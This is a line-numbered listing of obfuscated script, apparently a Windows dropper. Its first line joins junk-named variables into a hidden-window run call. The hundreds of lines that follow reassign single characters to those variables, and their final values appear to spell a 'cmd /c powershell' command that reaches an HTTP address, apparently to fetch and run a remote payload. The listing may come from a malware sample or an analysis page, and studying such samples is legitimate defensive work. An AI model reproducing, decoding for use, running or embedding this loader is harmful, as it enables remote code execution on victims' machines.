13 | this[tkyocmrt + pcrll + qffob + jjksw + qribkevsv + jxzpmxp + audhia][harprzo + jjksw + ofqqcthec + ubftmhtqn + audhia + ofqqcthec + yrygtvxba + tynsi + almvoq + ofqqcthec + qffob + audhia] ( tkyocmrt + pcrll + qffob + jjksw + qribkevsv + jxzpmxp + audhia + pwclggrql + pcrll + ryhygg + ofqqcthec + adydpw + adydpw ) [jjksw + ivkjmrpq + togktgric] ( qffob + gabmrier + lpnqxv + ehnfc + pvrmx + qffob + ehnfc + jxzpmxp + zpkcv + rjustrn + ofqqcthec + jjksw + vfcvqbgq + ryhygg + ofqqcthec + adydpw + adydpw + pwclggrql + ofqqcthec + kgnhjp + ofqqcthec + ehnfc + njraz + harprzo + zpkcv + gabmrier + gabmrier + ubftmhtqn + togktgric + lpnqxv + ehnfc + sqjapz + jmgpcdflz + togktgric + myjiqxzk + zpkcv + udfok + ofqqcthec + njraz + tkyocmrt + ofqqcthec + tynsi + nujhsgjtt + ofqqcthec + fwojsd + ivkjmrpq + ofqqcthec + vfcvqbgq + audhia + ehnfc + njraz + yrygtvxba + ivkjmrpq + audhia + bucjbhyj + qribkevsv + adydpw + ofqqcthec + ehnfc + gyuev + audhia + ofqqcthec + gabmrier + jxzpmxp + gyuev + ewjvsdgtn + qribkevsv + togktgric + myjiqxzk + zpkcv + qribkevsv + qffob + ofqqcthec + pwclggrql + jxzpmxp + lpnqxv + excqleerx + ehnfc + ryhygg + audhia + audhia + jxzpmxp + drmzwgk + pvrmx + pvrmx + xbkwsngr + tvfhi + ewpywdib + pwclggrql + xbkwsngr + zqzmgmcm + ewpywdib + pwclggrql + xbkwsngr + pwclggrql + rcacusc + uzyfcgq + chkldhx + pvrmx + qribkevsv + togktgric + myjiqxzk + zpkcv + qribkevsv + qffob + ofqqcthec + pwclggrql + jxzpmxp + ryhygg + jxzpmxp + sqjapz + qdjnproo + qdjnproo + vfcvqbgq + audhia + ubftmhtqn + jjksw + audhia + ehnfc + gyuev + audhia + ofqqcthec + gabmrier + jxzpmxp + gyuev + ewjvsdgtn + qribkevsv + togktgric + myjiqxzk + zpkcv + qribkevsv + qffob + ofqqcthec + pwclggrql + jxzpmxp + lpnqxv + excqleerx + qdjnproo + qdjnproo + qffob + gabmrier + lpnqxv + ehnfc + pvrmx + qffob + ehnfc + togktgric + ofqqcthec + audhia + ehnfc + ivkjmrpq + vfcvqbgq + ofqqcthec + ehnfc + ewjvsdgtn + ewjvsdgtn + xbkwsngr + tvfhi + ewpywdib + pwclggrql + xbkwsngr + zqzmgmcm + ewpywdib + pwclggrql + xbkwsngr + pwclggrql + rcacusc + uzyfcgq + chkldhx + uphyib + zeknadh + zeknadh + zeknadh + zeknadh + ewjvsdgtn + lpnqxv + ubftmhtqn + myjiqxzk + rjustrn + rjustrn + rjustrn + jjksw + zpkcv + zpkcv + audhia + ewjvsdgtn + qdjnproo + qdjnproo + qffob + gabmrier + lpnqxv + ehnfc + pvrmx + qffob + ehnfc + jjksw + ofqqcthec + icpnu + vfcvqbgq + myjiqxzk + jjksw + ewpywdib + rcacusc + ehnfc + pvrmx + vfcvqbgq + ehnfc + ewjvsdgtn + ewjvsdgtn + xbkwsngr + tvfhi + ewpywdib + pwclggrql + xbkwsngr + zqzmgmcm + ewpywdib + pwclggrql + xbkwsngr + pwclggrql + rcacusc + uzyfcgq + chkldhx + uphyib + zeknadh + zeknadh + zeknadh + zeknadh + ewjvsdgtn + lpnqxv + ubftmhtqn + myjiqxzk + rjustrn + rjustrn + rjustrn + jjksw + zpkcv + zpkcv + audhia + ewjvsdgtn + xbkwsngr + chkldhx + xbkwsngr + xbkwsngr + ewpywdib + xbkwsngr + bfklfswhr + xbkwsngr + uzyfcgq + rcacusc + xbkwsngr + zqzmgmcm + xbkwsngr + zqzmgmcm + zeknadh + pwclggrql + lpnqxv + adydpw + adydpw, 0, false ); |
|
14 | } | |
15 | drmzwgk = "B"; | |
16 | drmzwgk = "n"; | |
17 | drmzwgk = "Z"; | |
18 | drmzwgk = "g"; | |
19 | drmzwgk = "t"; | |
20 | drmzwgk = "H"; | |
21 | drmzwgk = "C"; | |
22 | drmzwgk = "a"; | |
23 | drmzwgk = "Y"; | |
24 | drmzwgk = "l"; | |
25 | drmzwgk = "D"; | |
26 | drmzwgk = "X"; | |
27 | drmzwgk = "P"; | |
28 | drmzwgk = "D"; | |
29 | drmzwgk = "X"; | |
30 | drmzwgk = "P"; | |
31 | drmzwgk = "b"; | |
32 | drmzwgk = "v"; | |
33 | drmzwgk = "w"; | |
34 | drmzwgk = "j"; | |
35 | drmzwgk = "L"; | |
36 | drmzwgk = "W"; | |
37 | drmzwgk = "D"; | |
38 | drmzwgk = "G"; | |
39 | drmzwgk = "N"; | |
40 | drmzwgk = "d"; | |
41 | drmzwgk = "i"; | |
42 | drmzwgk = "e"; | |
43 | drmzwgk = "Z"; | |
44 | drmzwgk = "k"; | |
45 | drmzwgk = "Z"; | |
46 | drmzwgk = "T"; | |
47 | drmzwgk = "C"; | |
48 | drmzwgk = "r"; | |
49 | drmzwgk = "v"; | |
50 | drmzwgk = "c"; | |
51 | drmzwgk = "n"; | |
52 | drmzwgk = "m"; | |
53 | drmzwgk = "a"; | |
54 | drmzwgk = "h"; | |
55 | drmzwgk = "q"; | |
56 | drmzwgk = "s"; | |
57 | drmzwgk = "i"; | |
58 | drmzwgk = "q"; | |
59 | drmzwgk = ":"; | |
60 | gabmrier = "O"; | |
61 | gabmrier = "h"; | |
62 | gabmrier = "h"; | |
63 | gabmrier = "z"; | |
64 | gabmrier = "W"; | |
65 | gabmrier = "k"; | |
66 | gabmrier = "O"; | |
67 | gabmrier = "x"; | |
68 | gabmrier = "o"; | |
69 | gabmrier = "C"; | |
70 | gabmrier = "M"; | |
71 | gabmrier = "s"; | |
72 | gabmrier = "r"; | |
73 | gabmrier = "z"; | |
74 | gabmrier = "y"; | |
75 | gabmrier = "N"; | |
76 | gabmrier = "H"; | |
77 | gabmrier = "z"; | |
78 | gabmrier = "z"; | |
79 | gabmrier = "C"; | |
80 | gabmrier = "L"; | |
81 | gabmrier = "H"; | |
82 | gabmrier = "A"; | |
83 | gabmrier = "t"; | |
84 | gabmrier = "F"; | |
85 | gabmrier = "Y"; | |
86 | gabmrier = "b"; | |
87 | gabmrier = "Y"; | |
88 | gabmrier = "P"; | |
89 | gabmrier = "n"; | |
90 | gabmrier = "m"; | |
91 | gabmrier = "N"; | |
92 | gabmrier = "d"; | |
93 | gabmrier = "i"; | |
94 | gabmrier = "h"; | |
95 | gabmrier = "n"; | |
96 | gabmrier = "M"; | |
97 | gabmrier = "H"; | |
98 | gabmrier = "c"; | |
99 | gabmrier = "D"; | |
100 | gabmrier = "m"; | |
101 | vfcvqbgq = "C"; | |
102 | vfcvqbgq = "s"; | |
103 | myjiqxzk = "Z"; | |
104 | myjiqxzk = "K"; | |
105 | myjiqxzk = "v"; | |
106 | jxzpmxp = "N"; | |
107 | jxzpmxp = "c"; | |
108 | jxzpmxp = "D"; | |
109 | jxzpmxp = "i"; | |
110 | jxzpmxp = "U"; | |
111 | jxzpmxp = "h"; | |
112 | jxzpmxp = "e"; | |
113 | jxzpmxp = "S"; | |
114 | jxzpmxp = "n"; | |
115 | jxzpmxp = "m"; | |
116 | jxzpmxp = "K"; | |
117 | jxzpmxp = "C"; | |
118 | jxzpmxp = "i"; | |
119 | jxzpmxp = "C"; | |
120 | jxzpmxp = "P"; | |
121 | jxzpmxp = "G"; | |
122 | jxzpmxp = "u"; | |
123 | jxzpmxp = "H"; | |
124 | jxzpmxp = "D"; | |
125 | jxzpmxp = "S"; | |
126 | jxzpmxp = "p"; | |
127 | kgnhjp = "h"; | |
128 | kgnhjp = "a"; | |
129 | kgnhjp = "B"; | |
130 | kgnhjp = "A"; | |
131 | kgnhjp = "b"; | |
132 | kgnhjp = "R"; | |
133 | kgnhjp = "R"; | |
134 | kgnhjp = "T"; | |
135 | kgnhjp = "u"; | |
136 | kgnhjp = "D"; | |
137 | kgnhjp = "m"; | |
138 | kgnhjp = "w"; | |
139 | kgnhjp = "N"; | |
140 | kgnhjp = "j"; | |
141 | kgnhjp = "l"; | |
142 | kgnhjp = "z"; | |
143 | kgnhjp = "J"; | |
144 | kgnhjp = "b"; | |
145 | kgnhjp = "I"; | |
146 | kgnhjp = "w"; | |
147 | kgnhjp = "w"; | |
148 | kgnhjp = "H"; | |
149 | kgnhjp = "i"; | |
150 | kgnhjp = "I"; | |
151 | kgnhjp = "K"; | |
152 | kgnhjp = "o"; | |
153 | kgnhjp = "s"; | |
154 | kgnhjp = "A"; | |
155 | kgnhjp = "I"; | |
156 | kgnhjp = "a"; | |
157 | kgnhjp = "U"; | |
158 | kgnhjp = "R"; | |
159 | kgnhjp = "z"; | |
160 | kgnhjp = "u"; | |
161 | kgnhjp = "E"; | |
162 | kgnhjp = "w"; | |
163 | kgnhjp = "W"; | |
164 | kgnhjp = "c"; | |
165 | kgnhjp = "g"; | |
166 | kgnhjp = "R"; | |
167 | kgnhjp = "c"; | |
168 | kgnhjp = "x"; | |
169 | uphyib = "k"; | |
170 | uphyib = "L"; | |
171 | uphyib = "r"; | |
172 | uphyib = "i"; | |
173 | uphyib = "x"; | |
174 | uphyib = "g"; | |
175 | uphyib = "S"; | |
176 | uphyib = "d"; | |
177 | uphyib = "N"; | |
178 | uphyib = "u"; | |
179 | uphyib = "B"; | |
180 | uphyib = "T"; | |
181 | uphyib = "h"; | |
182 | uphyib = "p"; | |
183 | uphyib = "s"; | |
184 | uphyib = "Q"; | |
185 | uphyib = "s"; | |
186 | uphyib = "U"; | |
187 | uphyib = "t"; | |
188 | uphyib = "F"; | |
189 | uphyib = "p"; | |
190 | uphyib = "s"; | |
191 | uphyib = "u"; | |
192 | uphyib = "A"; | |
193 | uphyib = "y"; | |
194 | uphyib = "R"; | |
195 | uphyib = "i"; | |
196 | uphyib = "L"; | |
197 | uphyib = "j"; | |
198 | uphyib = "V"; | |
199 | uphyib = "C"; | |
200 | uphyib = "j"; | |
201 | uphyib = "b"; | |
202 | uphyib = "I"; | |
203 | uphyib = "m"; | |
204 | uphyib = "m"; | |
205 | uphyib = "D"; | |
206 | uphyib = "x"; | |
207 | uphyib = "Y"; | |
208 | uphyib = "r"; | |
209 | uphyib = "q"; | |
210 | uphyib = "U"; | |
211 | uphyib = "J"; | |
212 | uphyib = "a"; | |
213 | uphyib = "@"; | |
214 | pvrmx = "/"; | |
215 | tynsi = "T"; | |
216 | tynsi = "n"; | |
217 | tynsi = "O"; | |
218 | tynsi = "d"; | |
219 | tynsi = "U"; | |
220 | tynsi = "I"; | |
221 | tynsi = "R"; | |
222 | tynsi = "B"; | |
223 | tynsi = "B"; | |
224 | tynsi = "y"; | |
225 | tynsi = "e"; | |
226 | tynsi = "e"; | |
227 | tynsi = "o"; | |
228 | tynsi = "k"; | |
229 | tynsi = "W"; | |
230 | tynsi = "f"; | |
231 | tynsi = "c"; | |
232 | tynsi = "n"; | |
233 | tynsi = "l"; | |
234 | tynsi = "a"; | |
235 | tynsi = "N"; | |
236 | tynsi = "L"; | |
237 | tynsi = "R"; | |
238 | tynsi = "L"; | |
239 | tynsi = "B"; | |
240 | tynsi = "F"; | |
241 | tynsi = "Z"; | |
242 | tynsi = "B"; | |
243 | tynsi = "j"; | |
244 | tynsi = "i"; | |
245 | tynsi = "o"; | |
246 | tynsi = "o"; | |
247 | tynsi = "E"; | |
248 | tynsi = "j"; | |
249 | tynsi = "D"; | |
250 | tynsi = "P"; | |
251 | tynsi = "E"; | |
252 | tynsi = "i"; | |
253 | tynsi = "p"; | |
254 | tynsi = "p"; | |
255 | tynsi = "D"; | |
256 | tynsi = "w"; | |
257 | tynsi = "b"; | |
258 | almvoq = "e"; | |
259 | almvoq = "j"; | |
260 | peinqdvn = "A"; | |
261 | peinqdvn = "y"; | |
262 | peinqdvn = "c"; | |
263 | peinqdvn = "d"; | |
264 | peinqdvn = "Q"; | |
265 | peinqdvn = "S"; | |
266 | peinqdvn = "q"; | |
267 | peinqdvn = "O"; | |
268 | peinqdvn = "w"; | |
269 | peinqdvn = "X"; | |
270 | peinqdvn = "T"; | |
271 | peinqdvn = "p"; | |
272 | peinqdvn = "a"; | |
273 | peinqdvn = "T"; | |
274 | peinqdvn = "V"; | |
275 | peinqdvn = "N"; | |
276 | peinqdvn = "W"; | |
277 | peinqdvn = "D"; | |
278 | peinqdvn = "q"; | |
279 | peinqdvn = "o"; | |
280 | peinqdvn = "C"; | |
281 | peinqdvn = "l"; | |
282 | peinqdvn = "d"; | |
283 | peinqdvn = "T"; | |
284 | peinqdvn = "J"; | |
285 | peinqdvn = "N"; | |
286 | peinqdvn = "B"; | |
287 | peinqdvn = "E"; | |
288 | peinqdvn = "u"; | |
289 | peinqdvn = "H"; | |
290 | peinqdvn = "i"; | |
291 | peinqdvn = "B"; | |
292 | peinqdvn = "v"; | |
293 | peinqdvn = "L"; | |
294 | peinqdvn = "l"; | |
295 | peinqdvn = "S"; | |
296 | peinqdvn = "y"; | |
297 | peinqdvn = "E"; | |
298 | peinqdvn = "a"; | |
299 | peinqdvn = "m"; | |
300 | peinqdvn = "i"; | |
301 | peinqdvn = "v"; | |
302 | peinqdvn = "g"; | |
303 | peinqdvn = "G"; | |
304 | peinqdvn = "N"; | |
305 | yevlmr = "Y"; | |
306 | yevlmr = "y"; | |
307 | yevlmr = "y"; | |
308 | yevlmr = "T"; | |
309 | yevlmr = "s"; | |
310 | yevlmr = "b"; | |
311 | yevlmr = "r"; | |
312 | yevlmr = "Y"; | |
313 | yevlmr = "U"; | |
314 | yevlmr = "n"; | |
315 | yevlmr = "p"; | |
316 | yevlmr = "s"; | |
317 | yevlmr = "i"; | |
318 | yevlmr = "q"; | |
319 | yevlmr = "W"; | |
320 | yevlmr = "Q"; | |
321 | yevlmr = "m"; | |
322 | yevlmr = "b"; | |
323 | yevlmr = "g"; | |
324 | yevlmr = "O"; | |
325 | yevlmr = "j"; | |
326 | yevlmr = "x"; | |
327 | yevlmr = "Y"; | |
328 | yevlmr = "f"; | |
329 | yevlmr = "A"; | |
330 | yevlmr = "c"; | |
331 | yevlmr = "n"; | |
332 | yevlmr = "b"; | |
333 | yevlmr = "L"; | |
334 | yevlmr = "W"; | |
335 | yevlmr = "b"; | |
336 | yevlmr = "r"; | |
337 | yevlmr = "e"; | |
338 | yevlmr = "m"; | |
339 | yevlmr = "d"; | |
340 | yevlmr = "c"; | |
341 | yevlmr = "G"; | |
342 | yevlmr = "e"; | |
343 | yevlmr = "O"; | |
344 | yevlmr = "f"; | |
345 | yevlmr = "U"; | |
346 | pcrll = "U"; | |
347 | pcrll = "w"; | |
348 | pcrll = "V"; | |
349 | pcrll = "d"; | |
350 | pcrll = "I"; | |
351 | pcrll = "I"; | |
352 | pcrll = "a"; | |
353 | pcrll = "W"; | |
354 | pcrll = "i"; | |
355 | pcrll = "K"; | |
356 | pcrll = "S"; | |
357 | pcrll = "Z"; | |
358 | pcrll = "E"; | |
359 | pcrll = "o"; | |
360 | pcrll = "m"; | |
361 | pcrll = "F"; | |
362 | pcrll = "r"; | |
363 | pcrll = "y"; | |
364 | pcrll = "Y"; | |
365 | pcrll = "p"; | |
366 | pcrll = "y"; | |
367 | pcrll = "G"; | |
368 | pcrll = "H"; | |
369 | pcrll = "E"; | |
370 | pcrll = "E"; | |
371 | pcrll = "V"; | |
372 | pcrll = "n"; | |
373 | pcrll = "I"; | |
374 | pcrll = "w"; | |
375 | pcrll = "S"; | |
376 | pcrll = "d"; | |
377 | pcrll = "g"; | |
378 | pcrll = "k"; | |
379 | pcrll = "L"; | |
380 | pcrll = "z"; | |
381 | pcrll = "V"; | |
382 | pcrll = "l"; | |
383 | pcrll = "F"; | |
384 | pcrll = "M"; | |
385 | pcrll = "R"; | |
386 | pcrll = "W"; | |
387 | pcrll = "S"; | |
388 | pcrll = "S"; | |
389 | ymabu = "I"; | |
390 | ymabu = "c"; | |
391 | ymabu = "s"; | |
392 | ymabu = "U"; | |
393 | ymabu = "u"; | |
394 | ymabu = "F"; | |
395 | ymabu = "c"; | |
396 | ymabu = "M"; | |
397 | ymabu = "P"; | |
398 | ymabu = "i"; | |
399 | ymabu = "v"; | |
400 | ymabu = "h"; | |
401 | ymabu = "O"; | |
402 | ymabu = "w"; | |
403 | ymabu = "m"; | |
404 | ymabu = "x"; | |
405 | ymabu = "U"; | |
406 | ymabu = "Z"; | |
407 | ymabu = "b"; | |
408 | ymabu = "d"; | |
409 | ymabu = "W"; | |
410 | ymabu = "O"; | |
411 | ymabu = "u"; | |
412 | ymabu = "y"; | |
413 | ymabu = "T"; | |
414 | ymabu = "L"; | |
415 | ymabu = "X"; | |
416 | ymabu = "A"; | |
417 | ymabu = "C"; | |
418 | ymabu = "B"; | |
419 | ymabu = "K"; | |
420 | togktgric = "R"; | |
421 | togktgric = "n"; | |
422 | pwclggrql = "J"; | |
423 | pwclggrql = "s"; | |
424 | pwclggrql = "D"; | |
425 | pwclggrql = "I"; | |
426 | pwclggrql = "h"; | |
427 | pwclggrql = "O"; | |
428 | pwclggrql = "S"; | |
429 | pwclggrql = "p"; | |
430 | pwclggrql = "N"; | |
431 | pwclggrql = "v"; | |
432 | pwclggrql = "F"; | |
433 | pwclggrql = "G"; | |
434 | pwclggrql = "N"; | |
435 | pwclggrql = "k"; | |
436 | pwclggrql = "Q"; | |
437 | pwclggrql = "P"; | |
438 | pwclggrql = "U"; | |
439 | pwclggrql = "N"; | |
440 | pwclggrql = "H"; | |
441 | pwclggrql = "V"; | |
442 | pwclggrql = "S"; | |
443 | pwclggrql = "T"; | |
444 | pwclggrql = "I"; | |
445 | pwclggrql = "O"; | |
446 | pwclggrql = "."; | |
447 | fwojsd = "T"; | |
448 | fwojsd = "D"; | |
449 | fwojsd = "h"; | |
450 | fwojsd = "k"; | |
451 | fwojsd = "Z"; | |
452 | fwojsd = "S"; | |
453 | fwojsd = "h"; | |
454 | fwojsd = "y"; | |
455 | fwojsd = "i"; | |
456 | fwojsd = "w"; | |
457 | fwojsd = "W"; | |
458 | fwojsd = "P"; | |
459 | fwojsd = "q"; | |
460 | excqleerx = "I"; | |
461 | excqleerx = "o"; | |
462 | excqleerx = "J"; | |
463 | excqleerx = "z"; | |
464 | excqleerx = "U"; | |
465 | excqleerx = "O"; | |
466 | excqleerx = "j"; | |
467 | excqleerx = "K"; | |
468 | excqleerx = "f"; | |
469 | excqleerx = "D"; | |
470 | excqleerx = "b"; | |
471 | excqleerx = "f"; | |
472 | rcacusc = "H"; | |
473 | rcacusc = "U"; | |
474 | rcacusc = "O"; | |
475 | rcacusc = "B"; | |
476 | rcacusc = "z"; | |
477 | rcacusc = "n"; | |
478 | rcacusc = "d"; | |
479 | rcacusc = "S"; | |
480 | rcacusc = "z"; | |
481 | rcacusc = "p"; | |
482 | rcacusc = "A"; | |
483 | rcacusc = "j"; | |
484 | rcacusc = "p"; | |
485 | rcacusc = "h"; | |
486 | rcacusc = "2"; | |
487 | xbkwsngr = "r"; | |
488 | xbkwsngr = "r"; | |
489 | xbkwsngr = "a"; | |
490 | xbkwsngr = "k"; | |
491 | xbkwsngr = "k"; | |
492 | xbkwsngr = "W"; | |
493 | xbkwsngr = "H"; | |
494 | xbkwsngr = "y"; | |
495 | xbkwsngr = "l"; | |
496 | xbkwsngr = "c"; | |
497 | xbkwsngr = "g"; | |
498 | xbkwsngr = "R"; | |
499 | xbkwsngr = "f"; | |
500 | xbkwsngr = "g"; | |
501 | xbkwsngr = "s"; | |
502 | xbkwsngr = "U"; | |
503 | xbkwsngr = "I"; | |
504 | xbkwsngr = "V"; | |
505 | xbkwsngr = "K"; | |
506 | xbkwsngr = "g"; | |
507 | xbkwsngr = "z"; | |
508 | xbkwsngr = "O"; | |
509 | xbkwsngr = "A"; | |
510 | xbkwsngr = "T"; | |
511 | xbkwsngr = "d"; | |
512 | xbkwsngr = "u"; | |
513 | xbkwsngr = "M"; | |
514 | xbkwsngr = "V"; | |
515 | xbkwsngr = "1"; | |
516 | qribkevsv = "Q"; | |
517 | qribkevsv = "c"; | |
518 | qribkevsv = "T"; | |
519 | qribkevsv = "J"; | |
520 | qribkevsv = "j"; | |
521 | qribkevsv = "O"; | |
522 | qribkevsv = "J"; | |
523 | qribkevsv = "K"; | |
524 | qribkevsv = "x"; | |
525 | qribkevsv = "i"; | |
526 | yrygtvxba = "g"; | |
527 | yrygtvxba = "e"; | |
528 | yrygtvxba = "s"; | |
529 | yrygtvxba = "f"; | |
530 | yrygtvxba = "e"; | |
531 | yrygtvxba = "n"; | |
532 | yrygtvxba = "i"; | |
533 | yrygtvxba = "t"; | |
534 | yrygtvxba = "k"; | |
535 | yrygtvxba = "q"; | |
536 | yrygtvxba = "z"; | |
537 | yrygtvxba = "m"; | |
538 | yrygtvxba = "v"; | |
539 | yrygtvxba = "j"; | |
540 | yrygtvxba = "W"; | |
541 | yrygtvxba = "L"; | |
542 | yrygtvxba = "M"; | |
543 | yrygtvxba = "z"; | |
544 | yrygtvxba = "J"; | |
545 | yrygtvxba = "G"; | |
546 | yrygtvxba = "E"; | |
547 | yrygtvxba = "M"; | |
548 | yrygtvxba = "i"; | |
549 | yrygtvxba = "X"; | |
550 | yrygtvxba = "O"; | |
551 | ktmirwjdq = "d"; | |
552 | ktmirwjdq = "g"; | |
553 | ktmirwjdq = "i"; | |
554 | ktmirwjdq = "r"; | |
555 | ktmirwjdq = "Z"; | |
556 | ktmirwjdq = "c"; | |
557 | ktmirwjdq = "m"; | |
558 | ktmirwjdq = "f"; | |
559 | ktmirwjdq = "u"; | |
560 | ktmirwjdq = "F"; | |
561 | ktmirwjdq = "F"; | |
562 | ktmirwjdq = "j"; | |
563 | ktmirwjdq = "m"; | |
564 | ktmirwjdq = "i"; | |
565 | ktmirwjdq = "R"; | |
566 | ktmirwjdq = "a"; | |
567 | ktmirwjdq = "Q"; | |
568 | ryhygg = "h"; | |
569 | njraz = "C"; | |
570 | njraz = "K"; | |
571 | njraz = "e"; | |
572 | njraz = "z"; | |
573 | njraz = "g"; | |
574 | njraz = "r"; | |
575 | njraz = "O"; | |
576 | njraz = "A"; | |
577 | njraz = "T"; | |
578 | njraz = "r"; | |
579 | njraz = "G"; | |
580 | njraz = "E"; | |
581 | njraz = "O"; | |
582 | njraz = "l"; | |
583 | njraz = "b"; | |
584 | njraz = "c"; | |
585 | njraz = "-"; | |
586 | audhia = "F"; | |
587 | audhia = "q"; | |
588 | audhia = "I"; | |
589 | audhia = "K"; | |
590 | audhia = "y"; | |
591 | audhia = "B"; | |
592 | audhia = "r"; | |
593 | audhia = "U"; | |
594 | audhia = "C"; | |
595 | audhia = "V"; | |
596 | audhia = "e"; | |
597 | audhia = "B"; | |
598 | audhia = "i"; | |
599 | audhia = "t"; | |
600 | bfklfswhr = "n"; | |
601 | bfklfswhr = "V"; | |
602 | bfklfswhr = "A"; | |
603 | bfklfswhr = "F"; | |
604 | bfklfswhr = "h"; | |
605 | bfklfswhr = "d"; | |
606 | bfklfswhr = "k"; | |
607 | bfklfswhr = "U"; | |
608 | bfklfswhr = "D"; | |
609 | bfklfswhr = "f"; | |
610 | bfklfswhr = "i"; | |
611 | bfklfswhr = "J"; | |
612 | bfklfswhr = "T"; | |
613 | bfklfswhr = "7"; | |
614 | bucjbhyj = "v"; | |
615 | bucjbhyj = "l"; | |
616 | bucjbhyj = "N"; | |
617 | bucjbhyj = "K"; | |
618 | bucjbhyj = "I"; | |
619 | bucjbhyj = "J"; | |
620 | bucjbhyj = "b"; | |
621 | bucjbhyj = "Z"; | |
622 | bucjbhyj = "c"; | |
623 | bucjbhyj = "F"; | |
624 | bucjbhyj = "Z"; | |
625 | bucjbhyj = "d"; | |
626 | bucjbhyj = "m"; | |
627 | bucjbhyj = "B"; | |
628 | bucjbhyj = "x"; | |
629 | bucjbhyj = "l"; | |
630 | bucjbhyj = "h"; | |
631 | bucjbhyj = "j"; | |
632 | bucjbhyj = "n"; | |
633 | bucjbhyj = "V"; | |
634 | bucjbhyj = "E"; | |
635 | bucjbhyj = "D"; | |
636 | bucjbhyj = "x"; | |
637 | bucjbhyj = "Q"; | |
638 | bucjbhyj = "x"; | |
639 | bucjbhyj = "t"; | |
640 | bucjbhyj = "N"; | |
641 | bucjbhyj = "W"; | |
642 | bucjbhyj = "Y"; | |
643 | bucjbhyj = "S"; | |
644 | bucjbhyj = "e"; | |
645 | bucjbhyj = "i"; | |
646 | bucjbhyj = "U"; | |
647 | bucjbhyj = "F"; | |
648 | gyuev = "e"; | |
649 | gyuev = "Q"; | |
650 | gyuev = "d"; | |
651 | gyuev = "t"; | |
652 | gyuev = "D"; | |
653 | gyuev = "x"; | |
654 | gyuev = "p"; | |
655 | gyuev = "o"; | |
656 | gyuev = "n"; | |
657 | gyuev = "Y"; | |
658 | gyuev = "O"; | |
659 | gyuev = "b"; | |
660 | gyuev = "Q"; | |
661 | gyuev = "D"; | |
662 | gyuev = "Y"; | |
663 | gyuev = "f"; | |
664 | gyuev = "X"; | |
665 | gyuev = "c"; | |
666 | gyuev = "S"; | |
667 | gyuev = "d"; | |
668 | gyuev = "s"; | |
669 | gyuev = "s"; | |
670 | gyuev = "K"; | |
671 | gyuev = "j"; | |
672 | gyuev = "J"; | |
673 | gyuev = "W"; | |
674 | gyuev = "V"; | |
675 | gyuev = "j"; | |
676 | gyuev = "P"; | |
677 | gyuev = "n"; | |
678 | gyuev = "m"; | |
679 | gyuev = "B"; | |
680 | gyuev = "%"; | |
681 | piqbsmm = "F"; | |
682 | piqbsmm = "s"; | |
683 | piqbsmm = "N"; | |
684 | piqbsmm = "T"; | |
685 | piqbsmm = "N"; | |
686 | piqbsmm = "o"; | |
687 | piqbsmm = "M"; | |
688 | piqbsmm = "X"; | |
689 | piqbsmm = "I"; | |
690 | piqbsmm = "E"; | |
691 | piqbsmm = "V"; | |
692 | piqbsmm = "W"; | |
693 | piqbsmm = "E"; | |
694 | piqbsmm = "h"; | |
695 | piqbsmm = "V"; | |
696 | piqbsmm = "Y"; | |
697 | twcdol = "c"; | |
698 | twcdol = "n"; | |
699 | twcdol = "n"; | |
700 | twcdol = "Y"; | |
701 | twcdol = "Z"; | |
702 | twcdol = "P"; | |
703 | twcdol = "S"; | |
704 | twcdol = "U"; | |
705 | twcdol = "d"; | |
706 | twcdol = "N"; | |
707 | twcdol = "n"; | |
708 | twcdol = "a"; | |
709 | twcdol = "U"; | |
710 | twcdol = "T"; | |
711 | twcdol = "r"; | |
712 | twcdol = "V"; | |
713 | twcdol = "D"; | |
714 | twcdol = "d"; | |
715 | twcdol = "j"; | |
716 | twcdol = "N"; | |
717 | twcdol = "k"; | |
718 | twcdol = "H"; | |
719 | twcdol = "D"; | |
720 | twcdol = "P"; | |
721 | icpnu = "q"; | |
722 | icpnu = "M"; | |
723 | icpnu = "I"; | |
724 | icpnu = "K"; | |
725 | icpnu = "H"; | |
726 | icpnu = "k"; | |
727 | icpnu = "F"; | |
728 | icpnu = "O"; | |
729 | icpnu = "u"; | |
730 | icpnu = "y"; | |
731 | icpnu = "R"; | |
732 | icpnu = "T"; | |
733 | icpnu = "Y"; | |
734 | icpnu = "u"; | |
735 | icpnu = "N"; | |
736 | icpnu = "n"; | |
737 | icpnu = "p"; | |
738 | icpnu = "I"; | |
739 | icpnu = "G"; | |
740 | icpnu = "L"; | |
741 | icpnu = "o"; | |
742 | icpnu = "A"; | |
743 | icpnu = "e"; | |
744 | icpnu = "R"; | |
745 | icpnu = "O"; | |
746 | icpnu = "U"; | |
747 | icpnu = "G"; | |
748 | icpnu = "D"; | |
749 | icpnu = "V"; | |
750 | icpnu = "S"; | |
751 | icpnu = "X"; | |
752 | icpnu = "e"; | |
753 | icpnu = "y"; | |
754 | icpnu = "u"; | |
755 | icpnu = "O"; | |
756 | icpnu = "G"; | |
757 | icpnu = "B"; | |
758 | icpnu = "g"; | |
759 | tvfhi = "p"; | |
760 | tvfhi = "b"; | |
761 | tvfhi = "E"; | |
762 | tvfhi = "p"; | |
763 | tvfhi = "x"; | |
764 | tvfhi = "e"; | |
765 | tvfhi = "E"; | |
766 | tvfhi = "x"; | |
767 | tvfhi = "X"; | |
768 | tvfhi = "9"; | |
769 | wenzzwqq = "o"; | |
770 | wenzzwqq = "l"; | |
771 | wenzzwqq = "c"; | |
772 | wenzzwqq = "q"; | |
773 | wenzzwqq = "O"; | |
774 | wenzzwqq = "j"; | |
775 | wenzzwqq = "x"; | |
776 | wenzzwqq = "H"; | |
777 | wenzzwqq = "J"; | |
778 | wenzzwqq = "Y"; | |
779 | wenzzwqq = "B"; | |
780 | wenzzwqq = "v"; | |
781 | wenzzwqq = "i"; | |
782 | wenzzwqq = "Z"; | |
783 | wenzzwqq = "H"; | |
784 | wenzzwqq = "x"; | |
785 | wenzzwqq = "z"; | |
786 | wenzzwqq = "J"; | |
787 | wenzzwqq = "K"; | |
788 | wenzzwqq = "R"; | |
789 | wenzzwqq = "f"; | |
790 | wenzzwqq = "o"; | |
791 | wenzzwqq = "M"; | |
792 | wenzzwqq = "x"; | |
793 | wenzzwqq = "B"; | |
794 | wenzzwqq = "P"; | |
795 | wenzzwqq = "g"; | |
796 | wenzzwqq = "G"; | |
797 | wenzzwqq = "E"; | |
798 | adydpw = "O"; | |
799 | adydpw = "F"; | |
800 | adydpw = "p"; | |
801 | adydpw = "K"; | |
802 | adydpw = "G"; | |
803 | adydpw = "R"; | |
804 | adydpw = "r"; | |
805 | adydpw = "S"; | |
806 | adydpw = "W"; | |
807 | adydpw = "Z"; | |
808 | adydpw = "b"; | |
809 | adydpw = "l"; | |
810 | sqjapz = "n"; | |
811 | sqjapz = "T"; | |
812 | sqjapz = "r"; | |
